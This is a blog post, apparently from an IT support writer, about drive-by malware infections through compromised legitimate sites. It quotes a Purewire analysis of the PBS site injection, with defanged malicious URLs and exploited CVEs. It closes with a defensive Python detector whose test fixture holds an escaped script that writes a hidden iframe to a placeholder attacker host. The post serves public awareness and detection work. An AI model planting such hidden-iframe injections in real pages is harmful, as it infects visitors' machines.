Over the past few weeks I’ve seen a rise in calls from clients that got malware infections on their PCs. They all ask the same thing: “How did I get infected, when I know better and don’t open attachments, and follow all those things everyone says you’re supposed to do to be safe?” I’ve had to explain that the latest way the bad guys are getting to your machine involves using exploits to infect websites that people visit every day, and then using the legitimate website to infect your PC.
If what is occurring still doesn’t make sense to you, think of it this way –
No matter where you live, everyone has seen a news story about someone who shows up at a home dressed like a water company or cable company employee, telling you that they need to get into your house to check something or into your back yard to fix something, and then once you let them in they do something like rob you (and hopefully that’s all they do). Well, what is occurring in the computer world is the same thing.
The Purewire blog (http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits) has a story about PBS that occurred last week (and PBS has since fixed this), but it shows how you could still get infected even after taking all the “best practices” precautions.
From the story:
On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded JavaScript that serves exploits from a malicious domain via an iframe.
A forensic analysis of this attack revealed that the user requested the following:
hxxp://www.pbs.org/parents/curiousgeorge
which in turn requested:
hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg
instead of:
hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg
Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.
[Screenshot: PBS login prompt]
If correct credentials are not provided, dipsy.pbs.org serves an error page that looks normal:
… until you look under the hood. The end of the error page’s source:
contains obfuscated JavaScript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious JavaScript from the following malicious URL:
hxxp://qxfcuc.info/f.cgi?jzo
The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992), CVE-2009-0927 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927), and CVE-2007-5659 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659)), AOL Radio AmpX (CVE-2007-6250 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250)), AOL SuperBuddy (CVE-2006-5820 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820)) and Apple QuickTime (CVE-2007-0015 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015)).
The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to "Send a message to ICQ #559156803; stats available under ststst02."
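The detection step the story describes (peel the cheap obfuscation off the inline script, then look for the iframe it writes to some other host) is easy to automate. The following is an added example written for this post; it is not Purewire's MJD engine or any code from PBS, and the two sample pages, the attacker.invalid domain and the payload are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample: a normal-looking error page whose tail carries injected,
# escaped script that writes a hidden iframe (placeholder domain, not the real one).
INJECTED_PAGE = """<html><body><h1>Not Found</h1><p>Nothing here.</p>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//attacker.invalid/f.cgi%3Fx%22%20width%3D0%20height%3D0%3E%3C/iframe%3E"))</script>
</body></html>"""

# Constructed benign page: a same-site iframe written by script must not be flagged.
BENIGN_PAGE = """<html><body><script>document.write('<iframe src="/embed/player.html"></iframe>')</script></body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")

def peel_obfuscation(js: str) -> str:
    """Undo the two cheap encodings most drive-by loaders use: %XX escapes
    (JS unescape; %uXXXX is not handled here) and String.fromCharCode number
    lists. Repeat until the text stops changing, since layers are often nested."""
    prev = None
    while prev != js:
        prev = js
        js = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)
        js = unquote(js)
    return js

def suspicious_iframes(html: str, page_url: str) -> list:
    """Return iframe src values written by inline script that point to a host
    other than the page's own. An off-host iframe emitted from script is the
    hallmark of the injection described above; relative or same-site ones pass."""
    page_host = urlparse(page_url).hostname
    hits = []
    for script in SCRIPT_RE.findall(html):
        for src in IFRAME_SRC_RE.findall(peel_obfuscation(script)):
            host = urlparse(src).hostname
            if host and host != page_host:
                hits.append(src)
    return hits

if __name__ == "__main__":
    print(suspicious_iframes(INJECTED_PAGE, "http://cdn.example.invalid/x.jpg"))
    print(suspicious_iframes(BENIGN_PAGE, "http://www.example.invalid/"))
```

Run it against the body of any page or sub-resource your proxy fetches; a hit on a page that should be static (an image path, an error page) is exactly the signal the story's forensic analysis found.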